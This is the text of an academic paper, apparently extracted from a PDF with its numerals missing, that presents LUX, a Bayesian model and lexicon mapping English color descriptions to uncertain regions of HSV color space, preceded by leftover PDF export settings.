/pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice a bayesian model of grounded color semantics brian mcmahan rutgers university brian.mcmahan@rutgers.edu matthew stone rutgers university matthew.stone@rutgers.edu abstract natural language meanings allow speakers to encode important real-world distinctions, but corpora of grounded language use also re- veal that speakers categorize the world in different ways and describe situations with different terminology. to learn meanings from data, we therefore need to link underly- ing representations of meaning to models of speaker judgment and speaker choice. this paper describes a new approach to this prob- lem: we model variability through uncertainty in categorization boundaries and distributions over preferred vocabulary. we apply the ap- proach to a large data set of color descrip- tions, where statistical evaluation documents its accuracy. the results are available as a lexicon of uncertain color standards (lux), which supports future efforts in grounded lan- guage understanding and generation by prob- abilistically mapping english color de- scriptions to potentially context-sensitive re- gions in hsv color space. introduction to ground natural language semantics in real-world data at large scale requires researchers to confront the vocabulary problem (furnas et al., ). much of what people say falls in a long tail of increas- ingly infrequent and specialized items. moreover, the choice of how to categorize and describe real- world data varies across people. we can’t account for this complexity by deriving one definitive map- ping between words and the world. we see this complexity already in free text de- scriptions of color patches. english has fewer than hue en tr op y (b its ) figure : a visualization of the variability of the de- scriptions used to name colors within small bins of color space. for each hue value, the entropy values for each bin along the saturation and value dimensions are grouped and plotted as box plots. the dotted line cor- responds to a random choice out of fourteen items and to the perplexity of a histogram model trained on the corpus. a dozen basic color words (berlin, ), but peo- ple’s descriptions of colors are much more variable than this would suggest. measured on the corpus described in section . , there’s an average of . bits of information in a color description given the color it describes—comparable to rolling a -sided die. figure summarizes the data and plots the en- tropy of descriptions encountered within small bins of color space. the bins are aggregated over the sat- uration and value dimensions and indexed on the x- axis by the hue dimension. there’s little reason to think that this variability conceals consistent mean- ings. in formal semantics, one of the hallmarks of vague language is that speakers can make it more precise in alternative, incompatible ways (barker, ). we see this in practice as well, for exam- ple with the image of figure , where subjects com- figure : image by flickr user joanne bacon (jlbacon) from the data set of young et al. ( ), whose subjects describe these dogs as a brown dog and a tan one or a tan dog and a white one. prehensibly describe either of two dogs as the tan one. systems that robustly understand or generate descriptions of colors in situated dialogue need mod- els of meaning that capture this variability. this paper makes two key contributions towards this challenge. first, we present a methodology to infer a corpus-based model of meaning that ac- counts for possible differences in word usage across different speakers. as we explain in section , our approach differs from the typical perspective in grounded semantics (tellex et al., a; matuszek et al., ; krishnamurthy and kollar, ), where a meaning is reduced to a single classifier that collapses patterns of variation. instead, our model allows for variability in meaning by positing uncer- tainty in classification boundaries that can get re- solved when a speaker chooses to use a word on a specific occasion. we explain the model and its the- oretical rationale in section . second, we develop and release a lexicon of uncertain color standards (lux) by applying our methodology to color descriptions. lux is an inter- pretation of distinct english color descriptions as distributions over regions of the hue–saturation– value color space that describe their possible mean- ings. as we describe in section , the model is trained by machine learning methods from a subset of randall munroe’s publicly-available cor- pus of . million crowdsourced free-text descrip- tions of color patches (munroe, ). data, models and visualization software are available at http: //mcmahan.io/lux/. statistical evaluation of our model against two alternative approaches documents its effectiveness. the model makes better quantitative predictions than a brute-force memorization model; it seems to generalize to unseen data in more meaningful ways. at the same time, our meanings work as well as special-purpose models to explain speaker choice, even though our model supports diverse other rea- soning. see section . we see color as the first of many applications of our methodology, and are optimistic about learn- ing vague meanings for other continuous domains as quantity, space, and time. at the same time, the methodology opens up new prospects for re- search on negotiating meaning interactively (lars- son, ) with principled representations and with broad coverage. in fact, many practical situated dia- logue systems already identify unfamiliar objects by color. we expect that lux will provide a broadly useful resource to extend the range of descriptions such systems can generate and understand. related work grounded semantics is the task of mapping rep- resentations of linguistic meaning to the physical world, whether by perceptual mechanisms (har- nad, ) or with the assistance of social inter- action (devault et al., ). in this paper, we are particularly concerned with grounding the mean- ings of primitive vocabulary. however, the ulti- mate test of grounded semantics—whether it is un- derstanding commands (winograd, ; tellex et al., b), describing states of the world (chen and mooney, ), or identifying objects (matuszek et al., ; krishnamurthy and kollar, ; dawson et al., )—is the ability to interpret or generate utterances using lexical and compositional seman- tics so as to evoke appropriate real-world referents. grounded semantics therefore involves more than just quantifying the associations between words and perceptual representations, as chuang et al. ( ) and heer and stone ( ) do for color. grounded semantics involves interpreting semantic primitives in terms of composable categories that let systems discriminate between cases where a word applies and cases where the word does not apply. (our eval- uation compares models of grounded semantics to more direct models of word–world associations.) previous research has modeled these categories as http://mcmahan.io/lux/ http://mcmahan.io/lux/ regions of suitable perceptual feature spaces. re- searchers have explored explicit spaces of high-level perceptual attributes (farhadi et al., ; silberer et al., ), approximations to such spaces (ma- tuszek et al., ), or low-level feature spaces such as bag of visual words (bruni et al., ) or histogram of gradients (krishnamurthy and kollar, ). we specifically follow gärdenfors ( ) and jäger ( ) in assuming that color categories are convex regions in an underlying color space, and are not just determined by prototypical color values, such as in andreas and klein ( ). however, unlike previous grounded semantics, we do not assume that words name categories un- equivocally. speakers may vary in how they inter- pret a word, so we treat the link between words and categories probabilistically. the difference makes training our model more indirect than previous ap- proaches to grounded meaning. in particular, our model introduces a new layer of uncertainty that de- scribes what category the speaker uses. similar kinds of uncertainty can be found in bayesian models of speaker strategy, such as that of smith et al. ( ). however, this research has assumed that speakers aim to be as informative as possible. we have no evidence that our speakers do that. we assume only that speakers’ utterances are reliable and mirror prevailing usage. prior work by cognitive scientists has studied color terms extensively, but focused on basic ones— monolexemic, top-level color words with general application and high frequency in a language (kay et al., ; lammens, ). these color categories seem to shape people’s expectations and memory for colors (persaud and hemmer, ), and pat- terns of color naming can therefore enhance soft- ware for helping people organize and interact with color (chuang et al., ; heer and stone, ). moreover, crosslinguistic evidence suggests that the human perceptual system places strong biases on the meanings of the basic color terms (regier et al., ), perhaps because basic terms must partition the perceptual space in an efficient way (regier et al., ). we depart from research on basic color naming in considering a much wider range of terms, much like andreas and klein ( ). we consider subordinate, non-basic terms like beige or lavender; modified colors like light blue or bright green; and named subcategories like olive green, navy blue or brick red. in order to use semantic primitives for under- standing, it’s necessary to combine them into an integrated sentence-level representation: this is the problem of semantic parsing. semantic parsers can be built by hand (winograd, ), induced through inductive logic programming (zelle and mooney, ), or treated as a structured classification prob- lem (zettlemoyer and collins, ). once a suit- able logical form is derived, interpretation typically involves a recursive process of finding referents that fit lexical categories and relationships (mavridis and roy, ; tellex et al., a). while this pa- per does not explicitly address how our meanings might be used in conjunction with such techniques, we see no fundamental obstacle to doing so—for ex- ample, by resolving references probabilistically and marginalizing over uncertainty in meaning. using vague color terms: a model our model involves two significant innovations over previous approaches to grounded meaning. the first is to capture the vagueness and flexibility of grounded meaning with semantic representations that treat meaning as uncertain. we represent the semantics of a color description with a distribu- tion over color categories, which weights possible meanings by the relative likelihood of a speaker us- ing this meaning on any particular occasion. for example, speakers might associate yellowish green with a range of possible meanings, differing in how far the color category extends into green hues. by representing uncertainty about meaning, our model makes room to capture variability in language use. for example, it implicitly quantifies how likely speakers are to use words differently, as with the two interpretations of tan in figure . our second contribution is our simple model of the relationship between semantics and pragmatics. we assume that speakers’ choices mirror established patterns. in particular, the model learns a measure of availability for each color term that tracks how frequently speakers tend to use it when it is appli- cable. for example, although the expressions yel- lowish green and chartreuse are associated with very similar color categories, people say yellowish green much more often: it has a higher availability. empir- ically, we find few terms with high availability and a long tail of terms with lower availabilities. we as- sume speakers simply sample applicable terms from this distribution, which predicts the long tail of ob- served responses. mathematically, we develop our approach through the rational analysis methodology for explaining human behavior proposed by anderson ( ), along with methodological insights from the linguistics and philosophy of vagueness. in the remainder of this section, we explain the theoretical antecedents in perceptual science, linguistics and cognitive modeling that inform our approach. . color categories color can be defined as sensations by which the per- ceptual system tracks the diffuse reflectance of ob- jects, despite variability, uncertainty and ambiguity in the visual input. red, green, and blue cones in the retina allow the visual system to coarsely es- timate frequency bands in the spectrum of incom- ing light. cameras and screens that use the red– green–blue (rgb) color space are designed roughly to correspond to these responses. however, colors in the visual system summarize spectral profiles rather than mere wavelengths of light. for example, we see colors like cyan (green plus blue without red), ma- genta (blue plus red without green) and yellow (red plus green without blue) as intermediate saturated colors between the familiar primaries. this natu- rally leads to a wheel of hues describing the relative prominence of different spectral components along a continuum. fairchild ( ) provides an overview of color appearance. to capture this variation, we’ll work in the sim- ple hue–saturation–value (hsv) color space that’s common in computer graphics and color picker user interfaces (hughes et al., ) and implemented in python’s native colorsys package. this coordinate system represents colors with three distinct qualita- tive dimensions: hue (h) represents changes in tint around a color wheel, saturation (s) represents the relative proportion of color versus gray, and value (v) represents the location on the white–black con- tinuum. we will associate color categories with rect- angular box-shaped regions in hsv space. more sophisticated color spaces have been developed to describe the psychophysics of color more precisely, but they depend on the photometric illumination and other aspects of the viewing context that were not controlled in the collection of the data we are using (fairchild, ). . semantic representation our assumption is that color terms are associated probabilistically with color categories. we illustrate the idea for the color label yellowish-green through the plot in figure . the plot shows variation in use of the term across the hue dimension: the bar graph is a scaled histogram of the responses in the data we use. there is a range of colors where people use yel- lowish green often, surrounded by borderline cases where it becomes increasingly infrequent. hue µlower µupper . . . . . p ro ba bi li ty τlower τupper φhuey ellowishgreen yellowish green data figure : the lux model for “yellowish green” on the hue axis plotted against the scaled histogram of the re- sponses in the data. the φ curve represents the likeli- hood of “yellowish green” for different hue values. the τ curves represent possible boundaries. we represent this variability by assuming that the boundaries that delimit the color are uncertain. in any utterance, yellowish green fits only those hue values that are above a minimum threshold τlower and below a maximum threshold τupper. however, it is uncertain which thresholds a speaker will use. the model describes this variability with probabil- ity density functions. they are shown for yellowish green in figure as the τ distributions. the figure shows that there is a central range of hues, between the τ distributions, that is definitely yellowish green. the τ distributions peak at the most likely bound- aries for yellowish green, encompassing a broad re- gion that’s frequently called yellowish green. fur- ther away, threshold values and yellowish green ut- terances alike become rapidly less likely. our representation is motivated by barker ( ) and lassiter ( ), who show how sets of possi- ble thresholds can account for many of our intu- itions about the use of vague language. their analy- sis invites us to capture semantic variability through two geometric constructs. first, there is a certain interval, parameterized by two points, µlower and µupper, within which a color description definitely applies. outside this interval are regions of bor- derline cases, delimited by probabilistically-varying thresholds τlower and τupper, where the color de- scription sometimes applies. we represent the po- sition of the threshold with a Γ(α,β) distribution, a standard statistical tool to model processes that start, continue indefinitely, and stop, like waiting times. we can determine a likelihood that a description fits a color by marginalizing over the thresholds: this gives the black curve visualized in figure . as we describe in section . , we can use this to account for the graded responses from subjects that we ob- serve near color boundaries. we summarize with a formal definition of our se- mantic representation. let x be the d space of hsv colors and let x ∈ x be a measured color value. each color label k has definite boundaries, µlower and µupper in x, delimiting a box of hsv color space. surrounding the definite region are regions of uncertainty: the set of possible bound- aries beyond µ. these are represented by probabil- ity distributions over lower and upper threshold val- ues in each dimension. we’ll represent these thresh- olds by τj,dk where k ∈ k indexes the color label, j ∈ {lower/l, upper/u} indexes the boundary, and d ∈ {h, s, v} indexes color components. we assume the thresholds are distributed as follows: τ lower,d k ∼ µ lower,d k − Γ(α lower,d k ,β lower,d k ) τ upper,d k ∼ µ upper,d k + Γ(α upper,d k ,β upper,d k ) ( ) the meaning of a color term is thus a “blurry box”. the distribution lets us determine the probability of we treat the terms “boundary”, “threshold”, and “standard” to be synonymous, but useful in different contexts. Γ distributions rise quickly away from the origin point, then trail off from the peak in an open-ended exponential de- cay. one intuition for applying them in this case is graff fara’s ( ) suggestion that a particular categorization decision in- volves waiting to find a natural break among salient colors. however, we choose them for mathematical convenience rather than psychological or linguistic considerations. figure : the rational observer observes a color patch, x. the applicability of each label (ktrue) is based upon the label parameters (α,β,µ) and x. the label (ksaid) is sampled proportional to the applicability and a back- ground weight: how often a label is said when it applies. a point x falling into the color category k as in eq. . we also use the compact notation in eq. . p(τ lower, h k < x h < τ upper, h k )× p(τ lower, s k < x s < τ upper, s k )× p(τ lower, v k < x v < τ upper, v k ) ( ) = ∏ d p(τ l,d k < x d i < τ u,d k ) ( ) . rational observer model our goal is to learn probabilistic representations of the meanings of color terms from subjects’ re- sponses. to do this, we need not only a framework for representing colors but also a model of how sub- jects choose color terms. inspired by rational anal- ysis (anderson, ), we assume that speakers’ choices match their communicative goals and their semantic knowledge. we leverage this assumption to derive a bayes rational observer model linking semantics to observed color descriptions. the graphical model in figure formalizes our approach. we start from an observed color patch, x. the rational observer uses the τ-distributions for each color description k to determine the likelihood that the speaker judges k applicable. as defined in eq. , the likelihood is the subset of possible bound- aries which contain the target color value. normally, many descriptions will be applicable. which the speaker chooses depends further on the availabil- ity of the label—a background measure of how fre- quently a label is chosen when it’s applicable. in- tuitively, availability creates a bias for easy descrip- tions, capturing how natural or ordinary a descrip- tion is in language use, how easily it springs to mind or how easily it is understood. we formalize this as a generative model. as we explain in section , we infer the parameters from our data. in eq. , we consider the conditional dis- tribution of a subject observing a color patch given hsv value x and labeling it k: ( )p(ksaid,ktrue|x) = p(ksaid|ktrue)p(ktrue|x) in this equation, ksaid is the event that the subject responds to x with label k and ktrue is the event that the subject judges k true of the hsv value x. the two factors of eq. are respectively the availability and applicability of the color label. availability: the prior p(ksaid|ktrue) quantifies the rate at which label k is used when it applies. we refer to this quantity as the availability and denote it as αk. availability captures the observed bias for frequent color terms. when multiple color labels fit a color value, those with higher availability will be used more often, but those with lower availability will still get used. this effect is partially responsible for the long tail of subjects’ responses. applicability: the second factor, p(ktrue|x), is the probability that k is true of, or applies to, the color value x. we calculate the applicability by marginalizing over all possible thresholds as in eq. . in other words, we calculate the probabil- ity mass of the boundaries which allow for this de- scription to apply. we treat each applicability judg- ment as independent of others. this implies that the relative frequency at which we see a color descrip- tion used is directly proportional to the proportion of boundaries which license it. for clearer notation and parameter estimation, we track thresholds with a piecewise function φdk(x d) as in eq. and figure . φdk(x d) =   p(xd > τ l,d k ), x d ≤ µl,dk p(xd < τ u,d k ), x d ≥ µu,dk , otherwise ( ) finally, eq. rewrites eq. to make the applica- bility and availability explicit. the model treats this equation as the probability of success for a bernoulli trial and the data as sampled from categorical dis- tributions formed by the set of k bernoulli random variables. this is discussed further in section . . ( )p(ksaid,ktrue|x) = αk ∏ d φdk(x d) learning experiment we worked with randall munroe’s crowdsourced corpus of color judgments, and fit the model us- ing the metropolis-hastings markov chain monte carlo, a gaussian random walk optimization method. this form of approximate bayesian infer- ence is described in section . . . munroe color corpus in , munroe elicited descriptions of color patches over the web. his platform asked users for background information such as sex, color- blindness, and monitor type, then presented color patches and let the user freely name them. the setup didn’t ensure that users see controlled colors or that users’ responses are reliable, but the experiment col- lected over . m items pairing rgb values with text descriptions. munroe’s methodology, data and re- sults are published online (munroe, ). munroe summarizes his results with idealized colors—rgb values that best exemplify high fre- quency color labels. in effect, munroe’s summary offers a prototype theory of color vocabulary, like that of andreas and klein ( ). an alternative theory, which we explore, is that variability in the applicability of labels is an important part of peo- ple’s knowledge of color semantics. we compare the two theories explicitly in section . our experiments focus on a subset of munroe’s data comprising , , data points and color descriptions, divided into a training set of %, a % development set, and a held-out test set of %. to minimize variability in language use, we selected data from users who self-report as non- colorblind english speakers. this accounts for . m of munroe’s . m items. to get our sub- set, we further restrict attention to labels used times or more, to ensure that there’s substantial ev- idence of each term’s breadth of applicability. we hand curated the responses to correct some mi- nor spelling variations involving a single-character http://blog.xkcd.com/ / / / color-survey-results/ http://blog.xkcd.com/ / / /color-survey-results/ http://blog.xkcd.com/ / / /color-survey-results/ change (“yellow green” vs “yellow-green”; “fuch- sia” vs “fuschia”, “fushia”, “fuchia”, and “fucsia”) and to remove high-frequency spam labels. we are left with color labels that fit these restrictions. finally, we used python’s colorsys to convert from rgb to hsv, where we hypothesize color meanings can be represented more simply. we include these data sets with our release at http://mcmahan. io/lux/ so our results can be replicated. . fitting the model parameters optimization of the model’s parameters is framed in a bayesian framework and interpreted as maximiz- ing the likelihood of the data given the parameters. we fit each label and each dimension independently. the data on each dimension is binned, as in figure , so we have binomial random variables for each bin. for each color label k, the probability of success is based on the model’s parameters. non-k data in the bin are observations of failure. this gives eq. : p(ndi,k|n d i ,z d k,φk) ∼ bin(n d i ,z d kφ d k(i)) ( ) here ndi is the number of data points in bin i on di- mension d, ndi,k is the number of data points for la- bel k in bin i on dimension d, and zdk is a normal- ization constant, implicitly reflecting both the avail- ability αk and the distribution of responses of the term across other color dimensions. the optimiza- tion process is a parameter search method which uses as an objective function the probability of ndi,k in eq. for all d,i, and k. parameter search: we adopt a bayesian coor- dinate descent which sequentially samples the cer- tain region parameter, µ, and the shape and rate pa- rameters (α and β) of the Γ distributions for all d and k independently. it also samples the estimated normalization constant, zdk . more specifically, the sampling is done using metropolis-hastings markov chain monte carlo (metropolis et al., ; chib and greenberg, ), which performs a gaussian random walk on the parameters . for each sample, the likelihood of the data, derived from the bino- mial variables, is compared for the new and old set we set the standard deviation of the sampling gaussian to be for each µ and . for each α and β after finding experi- mentally that it led to effective parameter search (gelman et al., ). of parameters. the new parameters are accepted proportionally to the ratio of the two likelihoods. multiple chains were run using different bin sizes per dimension and monitored for convergence using the generalized gelman-rubin diagnostic method (brooks and gelman, ). this methodology leaves us not only with the monte carlo estimate of the expected value for each parameter, but also a sampling distribution that quantifies the uncertainty in the parameters themselves. availability: availability is estimated as the ratio of the observed frequency of a label to its expected frequency given the parameters which define its dis- tribution. the expected frequency, a marginalization of the color space for the φ function, is calculated using the midpoint integration approximation. ( ) αk = p(ksaid,ktrue) p(ktrue) = count(k)/n∫ x p(ktrue|x)p(x) model evaluation lux explains munroe’s data via speakers’ rational use of probabilistic meanings, represented as sim- ple “blurry boxes”. in this section, we assess the effectiveness of this explanation. we anticipate two arguments against our model: first, that the represen- tation is too simple; second, that factoring speakers’ choices through a model of meaning is too cumber- some. we rebut these arguments by providing met- rics and results that suggest that lux escapes these objections and captures almost all of the structure in subjects’ responses. . alternative models to test lux’s representations, we built a brute-force histogram model (hm) that discretizes hsv space and tracks frequency distributions of labels directly in each discretized bin. similar histogram models have been developed by chuang et al. ( ) and (heer and stone, ) to build interfaces for inter- acting with color that are informed by human cat- egorization and naming. more precisely, our hm uses a linear interpolation method (chen and good- man, ) to combine three histograms of various http://mcmahan.io/lux/ http://mcmahan.io/lux/ granularity. this amounts to predicting responses by querying the training data. hm has the potential to expose whether lux is missing important fea- tures of the distribution of color descriptions. we also built a direct model of subjects’ choices of color terms. instead of appealing to the applica- bility and availability of a color label, it works with the observed frequency of a color label and a gaus- sian model of the probability of a color value for each label, as in eq. : ( )p(ksaid,ktrue|x) ∝p(x|ktrue)p(ksaid,ktrue) this gaussian model (gm) generalizes munroe’s pairing of labels with prototypical colors: p(x|ktrue) is a gaussian with diagonal covari- ance, so it associates each color term with a mean hsv value and with variances in each dimension that determine a label-specific distance metric. gm predicts speaker choice by weighting these distances probabilistically against the priors. gm completely sidesteps the need to model meaning categorically. it therefore has the potential to expose whether our assumptions about semantic representations and speaker choices hinder lux’s performance. . evaluation metrics we evaluate the models using two classes of met- rics on a held-out test set consisting of % of the corpus. the first type is based upon the posterior distribution over labels and the ranked position of subjects’ actual labels of color values. the second type is based upon the log likelihood of the models, which quantifies model fit. . . decision-based metrics to answer how accurate a model’s predictions are, we can locate subjects’ responses in the weighted rankings computed by the models. the topk measures: each model provides a posterior distribution over the possible labels. the most likely label of this posterior is the maximum likelihood estimate (mle). we track how often the mle color label is what the user actually said as specifically, the histograms are of size ( , , ), ( , , ), and ( , , ) across hue, saturation, and value with interpolation weights of . , . , and . respectively. these parame- ters were determined by taking the training set as -fold valida- tion sets. the top measure. for the histogram model, the top approximates the most frequent label ob- served in the data for a color value. we also measure how often the correct label appears in the first and most likely labels. these are denoted top and top respectively. . . likelihood-based metrics we can also measure how well a model explains speaker choice using the log likelihood of the labels given the model and the color values, denoted as llv (m). this is calculated using eq. across all n data points in the held-out test set. llv (m) is used when computing perplexity and aikake in- formation criterion (aic). we report all measures in bits. llv (m) = log pm (k true,ksaid|x) = ∑ i log pm (k true i ,k said i |xi) ( ) a more general measure of model fit is the log like- lihood of the color values and their labels jointly across the training set, ll(v ), given the model. it is defined and calculated analogously. perplexity perplexity has been used in past re- search to measure the performance of statistical lan- guage models (jelinek et al., ; brown et al., ). lower perplexity means that the model is less surprised by the data and so describes it more pre- cisely. we use it here to measure how well a model encodes the regularities in color descriptions. akaike information criterion: aic is derived from information theory (akaike, ) and bal- ances the model’s fit to the data with the complexity of the model by penalizing a larger number of pa- rameters. the intuition is that a smaller aic indi- cates a better balance of parameters and model fit. . evaluation results table summarizes the decision-based evalua- tion results. we see little penalty for lux and there is a caveat to these performance measures. all of the reported numbers are for the final data subset which we discuss in section . . we choose to use a subset which did not include color labels that had less than occurrences. in the english- speaking and american-citizenship subset, the rare description tail accounts for % of the data—roughly one third of the tail data is unique descriptions. if the tail represents real world top top top lux . % . % . % hm . % . % . % gm . % . % . % table : decision-based results. the percentage of cor- rect responses of , test-set data points are shown. −ll −llv aic perp lux . * . * . * . hm . * . * . * . gm . * . * . * . table : likelihood-based evaluation results: negative log likelihood of the data, negative log likelihood of labels given points, number of parameters, akaike in- formation criterion and perplexity of labels given color values. parameter counts for aic are for lux, for hm and for gm. gm’s constrained frameworks for modeling choices. however, the differences in the table, though nu- merically small, are significant (by binomial test) at p < . or less. in particular, the fact that lux wins top hints that its representations enable bet- ter generalization than hm or gm. the success of hm at top and top , meanwhile, suggests that some qualitative aspects of people’s use of color words do escape the strong assumptions of lux and gm—a point we return to below. at the same time, we draw a general lesson from the overall patterns of results in table . language users must be quite uncertain about how speakers will describe colors. speakers do not seem to choose the most likely color label in a majority of responses; their behavior shows a long tail. these results are in line with the probabilistic models of meaning and speaker choice we have developed. table summarizes the likelihood based metrics. gm’s estimates don’t fit the distribution of the test data as a whole: gm is a good model of what labels speakers give but not a good model of the points that get particular labels. by contrast, lux tops out ev- ery row in the table. hm is flexible enough in prin- ciple to mirror lux’s predictions; hm must suffer circumstances, our model is only applicable % of the time, and thus the performance metrics should be scaled down. we do not explicitly report the scaled numbers. from sparse data, given its vast number of parame- ters. by contrast, lux is able to capture the dis- tributions of speaker responses in deeper and more flexible ways by using semantics as an abstraction. our analysis of patterns of error in lux sug- gests that lux would best improved by more faith- ful models of linguistic meaning, rather than more elaborate models of subjects’ choices or more pow- erful learning methods. for one thing, neither lux nor the simple prototype model captures ambiguity, which sometimes arises in munroe’s data. an exam- ple is the color label melon, which has a multimodal distribution in the reddish-orange and green areas of color space shown in figure —most likely corre- sponding to people thinking about the distinct col- ors of the flesh of watermelon, cantaloupe and hon- eydew. interestingly, our model captures the more common usage. a different modeling challenge is illustrated by the behavior of greenish in figure . greenish seems to be an exception to the general assumption that color terms label convex categories. actually, green- ish seems to fit the boundary of green—the areas that are not definitely green but not definitely not green. (linguists often appeal to such concepts in the liter- ature on vagueness.) this is not a convex area so, not surprisingly, our model finds a poor match. ad- ditional research is needed to understand when it’s appropriate to give meanings more complex repre- sentations and how they can be learned. discussion and conclusion natural language color descriptions provide an ex- pressive, precise but open-ended vocabulary to char- acterize real-world objects. this paper documents hue . . . . . . p ro ba bi li ty φhuemelon melon data figure : for the hue dimension, the data for “melon” is plotted against the lux model’s φ curve. hue µlower µupper . . . . . . p ro ba bi li ty τlower τupper . . . . . . φhuegreenish greenish data figure : for the hue dimension, the data for “greenish” is plotted against the lux model’s φ curve. and releases lexicon of uncertain color standards (lux), which provides semantic representations of english color labels, derived from a large cor- pus of attested descriptions. our evaluation shows that lux provides a precise description of speak- ers’ free-text labels of color patches. our expec- tation therefore is that lux will serve as a useful resource for building systems for situated language understanding and generation that need to describe colors to english-speaking users. our work in lux has built closely on linguis- tic approaches to color meaning and psychological approaches to modeling experimental subjects. be- cause lux bridges linguistic theory, psychologi- cal data, and system building, lux also affords a unique set of resources for future research at the in- tersection of semantics and pragmatics of dialogue. for example, our work explains subjects’ deci- sions as a straightforward reflection of their com- municative goals in a probabilistic setting. our measures of availability and applicability can be seen as offering computational interpretations of the gricean maxims of manner and quality (grice, ). however, these particular interpretations don’t give rise to implicatures on our model— largely because our rational observer is so inclusive and variable in the descriptions it offers. to show this, we can analyze what an idealized hearer learns about an underlying color x when the speaker uses a color term k: this is p(x|ksaid). the model predic- tions are formalized in eq. . p(x|ksaid) = p(x|ksaid,ktrue) = p(ksaid,ktrue|x)p(x) p(ksaid,ktrue) = p(ksaid|ktrue)p(ktrue|x)p(x) p(ksaid|ktrue)p(ktrue) = αkp(k true|x)p(x) αkp(k true) = p(x|ktrue) ( ) we apply bayes’s rule, exploiting our model as- sumption that the speaker says k only when the speaker first judges that k is true. our model also tells us that, given that k is true, the speaker’s choice of whether to say k depends only on the availabil- ity αk of the term k. simplifying, we find that the pragmatic posterior—what we think the speaker was looking at when she said this word—coincides with the semantic posterior—what we think the word is true of. intuitively, the hearer knows that the term is true because the speaker has used the word, indepen- dent of the color x the speaker is describing. sim- ilarly, in our model of speaker choice, the speaker does not take x into account in choosing one of the applicable words to say (one way the speaker could do this, for example, would be to prefer terms that were more informative about the target color x). in- stead, the speaker simply samples from the candi- dates. that’s why the speaker’s choice reveals only what the semantics says about x. technically, this makes semantics a nash equi- librium, where the information the hearer recov- ers from an utterance is exactly the information the speaker intends to express—in keeping with a longstanding tradition in the philosophy of language (lewis, ; cumming, ). by contrast, re- searchers such as smith et al. ( ) adopt broadly similar formal assumptions but predict asymme- tries where sophisticated listeners can second-guess naive speakers’ choices and recover “extra” infor- mation that the speaker has revealed incidentally and unintentionally. the difference between this ap- proach and ours eventually leads to a difference in the priors over utterances, but it’s best explained through the different utilities that motivate speak- ers’ different choices in the first place. smith et al. ( ) assume speakers want to be informative; we assume they want to fit in. the empirical success of our approach on munroe’s data motivates a larger project to elicit data that can explicitly probe sub- jects’ communicative goals in relation to semantic coordination. meanwhile, our work formalizes probabilistic theories of vagueness with new scale and preci- sion. these naturally suggest that we test predictions about the dynamics of conversation drawn from the semantic literature on vagueness. for example, in hearing a description for an object, we come to know more about the standards governing the applicability of the description. this is outlined by barker ( ) as having a meta-semantic effect on the common ground among interlocutors. for example, hearing a yellow-green object called yellowish green should make objects in the same color range more likely to be referred to as yellowish green. we could use lux straightforwardly to represent such conceptual pacts (brennan and clark, ) via a posterior over threshold parameters. it’s natural to look for empir- ical evidence to assess the effectiveness of such rep- resentations of dependent context. a particularly important case involves descrip- tive material that distinguishes a target referent from salient alternatives, as in the understanding or gen- eration of referring expressions (krahmer and van deemter, ). following kyburg and morreau ( ), we could represent this using lux via a pos- terior over the threshold parameters that fit the target but exclude its alternatives. again, our model as- sociates such goals with quantitative measures that future research can explore empirically. meo et al. ( ) present an initial exploration of this idea. these open questions complement the key advan- tage that makes uncertainty about meaning crucial to the success of the model and experiments we have reported here. many kinds of language use seem to be highly variable, and approaches to grounded se- mantics need ways to make room for this variabil- ity both in the semantic representations they learn and the algorithms that induce these representations from language data. we have argued that uncertainty about meaning is a powerful new tool to do this. we look forward to future work addressing uncertainty 